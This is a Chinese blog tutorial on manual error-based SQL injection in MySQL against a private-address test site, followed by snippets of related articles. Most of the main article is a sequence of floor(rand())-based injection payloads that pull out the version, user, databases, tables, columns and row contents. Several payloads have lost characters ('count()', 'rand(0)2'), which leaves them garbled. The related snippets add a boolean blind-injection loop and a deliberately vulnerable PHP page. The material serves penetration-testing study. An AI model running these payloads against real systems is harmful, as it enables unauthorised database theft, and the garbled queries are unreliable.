Mysql现错手工注入+自己动手写渗透脚本

最新推荐文章于 2025-05-29 15:42:44 发布
原创 最新推荐文章于 2025-05-29 15:42:44 发布 · 742 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#mysql现错注入 #mysql显错注入脚本 #sqlmap

本文介绍SQL注入的概念及其攻击手法,包括如何通过手工注入获取数据库版本、用户、数据库名称等信息,以及如何使用工具进行自动化攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

                                 **sql注入**

简介:所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
Target:http://192.168.8.142:8080/test/sqlinsert?id=2
1、判断目标站点是否存在sql注入漏洞(判断方法加入永真条件永假条件)
目标站点正常请求的返回界面
http://192.168.8.142:8080/test/sqlinsert?id=2
在这里插入图片描述
加入永真条件请求结果
在这里插入图片描述
加入永假条件请求结果
在这里插入图片描述
2、利用漏洞获取数据
2.1 手工注入(显错)
数据库版本
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
在这里插入图片描述
版本:5.5.531
连接用户
and(select 1 from(select count(),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
在这里插入图片描述
连接用户:root@localhost
连接数据库
and(select 1 from(select count(),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
在这里插入图片描述
连接数据库:test
爆库
and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
在这里插入图片描述
爆其他数据库
and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
修改FROM information_schema.schemata LIMIT 1,1中limit的第一数字递加
在这里插入图片描述
表:
Test 0x74657374
performance_schema:0x706572666f726d616e63655f736368656d61
Mysql:0x6d7973716c
Job:0x6a6f62
Blog:0x626c6f67
information_schema:0x696e666f726d6174696f6e5f736368656d61
爆当前数据表
and(select 1 from(select count(),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
在这里插入图片描述
爆其他数据库表
and(select 1 from(select count(),concat((select (select (select concat(0x7e,table_name,0x7e))) from information_schema.tables where table_schema=库名的十六进制 limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
在这里插入图片描述
爆其他表
and(select 1 from(select count(),concat((select (select (select concat(0x7e,table_name,0x7e))) from information_schema.tables where table_schema=0x6d7973716c limit 2,1),floor(rand(0)2))x from information_schema.tables group by x)a)(原理同爆其他数据库)
在这里插入图片描述
爆字段(数据库,表名转换为16进制)
and(select 1 from(select count(),concat((select (select (select concat(0x7e,column_name,0x7e))) from information_schema.columns where table_schema=0x74657374 and table_name=0x6a6f62 limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)
在这里插入图片描述
爆其他字段
and(select 1 from(select count(),concat((select (select (select concat(0x7e,column_name,0x7e))) from information_schema.columns where table_schema=0x74657374 and table_name=0x6a6f62 limit 1,1),floor(rand(0)2))x from information_schema.tables group by x)a)(原理同爆其他数据库)
在这里插入图片描述
爆内容
and(select 1 from(select count(),concat((select (select (select concat(0x7e,id,0x7e,0x7e,name,0x7e))) from test.job limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
在这里插入图片描述
2.2 工具
爆数据库
在这里插入图片描述
爆表
在这里插入图片描述
爆字段
在这里插入图片描述
爆内容
在这里插入图片描述

2.3 自己写脚本注入
爆数据库
1、分析手工注入的语句构造构造动态查询语句
2、构造动态查询语句
3、根据页面长度分别从前和从后截断,获取报错信息中的数据库名,并保存到数组中备用
代码结果如下:
在这里插入图片描述
爆表
详情看代码注释
在这里插入图片描述
爆字段,爆内容原理同上

sqlmap跑宽字节注入(渗透测试之SQL注入之宽字节注入)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-09 1081
宽字节注入就是用一个大于128的十六进制数来吃掉转义符,gbk编码,字节作为一个字符的编码手工注入 一、什么是宽字节注入 宽字节是相对于ascII这样单字节而言的;像 GB2312、GBK、GB18030、BIG5、Shift_JIS 等这些都是常说的宽字节,实际上只有两字节。GBK 是一种多字符的编码,通常来说,一个 gbk 编码汉字,占用2个字节。一个 utf-8 编码的汉字,占用3个字节。 转义函数:为了过滤用户输入的一些数据,对特殊的字符加上反斜杠“\”进行转义; 宽字节注入指的是 mysql 数据
【网络安全 | 渗透工具】SQLmap加密注入教程+实战详析
等风来
08-02 8038
在使用手工注入绕过参数加密的限制时,需要构造出原始POC再进行加密注入,耗时耗力,因此采用sqlmap加密注入。表示只对该参数进行注入测试,不加 * 的话还会测试其他参数是否为注入点,增加时间。选择默认选项,跑sqlmap的时候加上这句话可节约时间、不需要回复提示
SQL注入脚本
ChiYanq7ng的博客
11-21 216
【代码】SQL注入脚本
SQL注入脚本
L1ni01
11-13 2315
SQL注入脚本 穷举 1.bool盲注脚本(post型) import requests url = "http://127.0.0.1/sqli-labs-master/Less-15/" result ="" for i in range(1,10): for j in range(65,150): payload1 = "0'^(ascii(substr(database(),{},1))>{})^1#".format(i,j) payload2 = "admin'^(ascii(
渗透攻击Mysql数据库服务(非常详细)从零基础入门到精通,收藏这篇就够了
最新发布
Libra1313的博客
05-29 995
接下来,你需要提权,你需要横向移动,你需要找到真正有价值的数据。但别忘了,工具是死的,人是活的。真正的挑战在于,如何绕过复杂的认证机制,如何利用未知的漏洞,如何在不留下痕迹的情况下,拿到你想要的东西。Metasploitable,这玩意儿,说是靶机,不如说是故意挖好的坑。呵呵,简直是公开的秘密。与其广撒网,不如集中火力,找到最薄弱的环节,一击致命。真正的挑战,在于你对安全本质的理解,在于你的创新思维,在于你永不满足的探索精神。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。
【PyHacker编指南】Sql注入脚本
XunanSec的博客
05-15 2425
这节课是巡安似海PyHacker编指南的《Sql注入脚本》有些注入sqlmap跑不出,例如延时注入,实际延时与语句延时时间不符,sqlmap就跑不出,这就需要我们自己根据实际情况编脚本注入了。文末,涉及了sqlmap tamper编,所以需要一定的python基础才能看懂。喜欢用Python脚本的小伙伴可以跟着一起
sql手工注入
qq_33160535的博客
01-27 882
环境 : deban 6,web for pentest ,下载地址https://pentesterlab.com/exercises/web_for_pentester 目录 sql手工注入 example1 example2 example3 example4 example5 example6 example7 example1 (1)测试注入点http:/...
mysql脚本注入_MySQL SQL 常见注入脚本
weixin_33048525的博客
02-02 331
VersionSELECT @@versionCommentsSELECT 1; #commentSELECT /*comment*/1;Current UserSELECT user();SELECT system_user();List UsersSELECT user FROM mysql .user; -- privList Password HashesSELECT host, user...
65.网络安全渗透测试—[SQL注入篇4]—[MySQL+PHP-手工注入详解]
qwsn
08-23 2147
我认为,无论是学习安全还是从事安全的人,多多少少都会有些许的情怀和使命感!!! 文章目录 一、MySQL+PHP 注入前置知识点 1、mysql的三种注释手段: 2、注入时常用的系统信息函数: 3、判断是否存在注入:`and/or逻辑语句` 4、判断字段/列数:`order by排序` 5、联合查询
70.网络安全渗透测试—[SQL注入篇9]—[MySQL+PHP-延时注入]
qwsn
01-18 2464
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、MySQL+PHP 延时注入 1、相关技术 二、延时注入示例:3步 1、判断是否存在注入 2、获取MySQL版本 3、获取库名 4、获取所有表名 5、获取字段名 6、获取数据 7、总结:
在一次渗透中学会编Tamper脚本
蚁景网安学院
05-21 434
拿到这个网站,通过对比查询,我们发...闭合参数 finsh 时,查询出的内容更多,经过进一步判断,确实存在漏洞。不过在测试的时候发存在一定的过滤,但是可以通过内联注释进行绕过。
基于python的sql注入脚本
03-04
适合刚学python和sql注入的人 import urllib2 import re
网页js脚本注入,可执行任意代码。
11-01
网页js脚本注入,可执行任意代码。这里有个实例教程,通过注入跳过验证码。
python sql注入脚本_python辅助sql手工注入猜解数据库案例分析
weixin_39782752的博客
12-03 263
存在sql注入漏洞简单一点可以直接用sqlmap工具暴库但是如果想深入理解sql注入的原理,可以尝试手工注入,配合python脚本手工猜解数据库首先hachbar开启获取cms登录后的sessionid值开始构造sql payload获取数据库名的长度:page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN (length(da...
如何用python开发自动化SQL注入脚本
haoahaoahaoahao的博客
01-11 2439
当得到数据库名长度后,使用?id=1' and substr(database(),1,1)='字母'--+ 判断数据库名。print("%s数据库共有" % db_name + str(tab_num) + "张表")print("%s表下有%d个字段" % (tab_name, dump_num))# print("第%d的长度为%d"%(i,usn_len))# print("第%d的长度为%d"%(i,usn_len))print("[-]第%d张表名为: %s" % (i, tab_name))
python sql注入脚本_防SQL注入脚本
weixin_35125164的博客
01-28 163
针对sql注入特征编的sql防注入脚本vi sql.sh#!/bin/bashselect_union(){date=`date +%F\(%H:%M:%S\)`keyword=`grep -E 'select' ./access.log | grep -E 'union' | awk '{print $1}'|sort | uniq`for i in $keyworddogrep '\' i...
别再傻傻的手工sql注入 --sqlmap 工具 带你当点鼠标的猴子
2301_81155391的博客
12-08 1106
-current-db 是为了简洁 只示当前的数据库 就是如果是root 就会有许多的杂库 如information呀什么的 很烦 就这样。--file-reader 就是文件的读取 当然也可以读取其他的配置文件 但是缺点就是读取的是编码的东西。风险:---risk (0-3) "" :指的是工具注入的这个风险的大小 意义和上边一样。就这样加密的我们的工具不知道这是加密的那还注入个毛啊 这个时候就需要使用我们的tamper。
良心SQL注入手工教程(看完血虐sqlilabs全关)
黑白的博客
11-08 2201
声明 学习SQL注入,不要只会工具,多看一些原理层的东西,提升会很快,想好好学SQL注入的,务必把这一块拿下 正文 在了解SQL注入前,建议先去了解一下SQL相关的知识,本文中看一先看看附录,那里面有一些SQL的结构和常用的函数(SQL也是一类语言,那当然离不开函数),看完之后,可以开始正文啦,我们这里以sqlilabs的62关为例(为什么选62关,因为62关的数据库名不变,表名和字段名,都是随机的,这样我的payload你们只能套用,具体的操作还是需要过过小脑瓜的),就用这一关学习SQL注入最难拿下的点,
dos攻击mysql_dos攻击原理及攻击实例(带脚本
weixin_32753181的博客
02-06 346
dos攻击原理:DoS攻击就是利用合理的服务请求来占用过多的服务资源,从而使合法用户无法得到服务的响应。(百度百科说的,大概就是这么个意思)。dos攻击与ddos攻击的区别就是,它是一对一的攻击,而ddos是分布式的攻击,作为入门,作为菜鸟,我们他妈哪里有那么多肉鸡给你用。。。所以不过对付一些带宽小,内存低,cpu渣的小型web服务器还是ok的。在,废话不多说,本地搭建一个web站点测试一下。测...
sql注入自己本地的mysql数据库
02-27
### 如何安全地测试SQL注入漏洞 #### 安全前提条件 为了确保合法性和安全性,在进行任何形式的安全测试之前,务必获得目标系统的授权许可。未经授权的渗透测试可能违反法律并造成不可预见的风险。 #### 测试环境准备 建议在一个完全隔离且受控的环境中构建用于学习目的的Web应用程序及其关联的MySQL数据库实例。可以采用虚拟机或容器化技术来创建这样的独立环境[^1]。 #### 构建易受攻击的应用程序 安装Nginx作为HTTP服务器,并配置PHP处理脚本请求。编一段简单的PHP代码片段,该代码接收来自用户的输入而不对其进行验证或转义,从而模拟存在潜在风险的真实场景: ```php <?php // 假设此文件名为vulnerable.php $servername = "localhost"; $username = "root"; // 替换为实际用户名 $password = ""; // 替换为实际密码 $dbname = "testdb"; $conn = new mysqli($servername, $username, $password, $dbname); if ($conn->connect_error) { die("Connection failed: " . $conn->connect_error); } $id = $_GET['id']; // 不要这样做!仅作教学用途! $sql = "SELECT * FROM users WHERE id=$id"; $result = $conn->query($sql); if ($result->num_rows > 0) { while($row = $result->fetch_assoc()) { echo "ID: " . htmlspecialchars($row["id"]). "<br>"; } } else { echo "No results found."; } $conn->close(); ?> ``` 这段代码展示了典型的不安全编程实践——直接将未经审查的用户输入嵌入到SQL查询中去执行。这正是导致SQL注入的根本原因所在[^3]。 #### 执行基本的手工注入尝试 通过向`http://yourserver/vulnerable.php?id=1`发送带有不同参数值的HTTP GET请求来进行初步探测。例如,当访问路径变为`?id=1' OR '1'='1`时,如果页面返回了预期之外的结果,则表明可能存在SQL注入漏洞[^2]。 请注意上述操作仅为理论讲解之用,在真实世界里绝不要试图利用他人网站上的此类缺陷实施非法行为。相反,应该专注于提高个人技能以便日后能够帮助开发团队识别和修复这些问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值